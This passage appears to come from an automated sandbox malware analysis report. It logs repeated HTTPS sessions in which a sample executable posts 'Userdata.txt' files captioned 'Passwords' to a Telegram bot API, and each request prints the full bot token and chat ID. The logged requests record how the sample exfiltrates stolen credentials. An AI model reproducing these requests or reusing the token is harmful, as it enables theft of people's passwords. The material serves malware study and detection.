                                                                                                            2025-01-10 20:41:43 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 30 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44672,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541703,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.850014149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:44 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32d4e14bf837
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:44 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 34 65 31 34 62 66 38 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32d4e14bf837Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:45 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:44 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:45 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44674,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541704,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.850016149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:46 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd32e7854d3f76
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 37 38 35 34 64 33 66 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd32e7854d3f76Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:47 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:46 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 537
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:47 UTC537INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44675,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541706,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.850018149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:48 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd330608dbbc35
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 36 30 38 64 62 62 63 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd330608dbbc35Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:49 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:49 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:49 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44677,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541709,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.850020149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:50 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3319dc5c2cdf
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:50 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 39 64 63 35 63 32 63 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3319dc5c2cdfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:50 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:50 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:50 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44679,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541710,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.850022149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:52 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd332da11f00c2
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 64 61 31 31 66 30 30 63 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd332da11f00c2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:52 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:52 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:52 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44681,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541712,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.850024149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:53 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd33400739d22b
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:53 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 34 30 30 37 33 39 64 32 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd33400739d22bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:53 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:53 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:41:53 UTC536INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 31 37 31 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44683,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736541713,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.850026149.154.167.2204435856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:41:55 UTC296OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3354ff8faf06
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:41:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 35 34 66 66 38 66 61 66 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3354ff8faf06Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:41:55 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:41:55 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 536
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
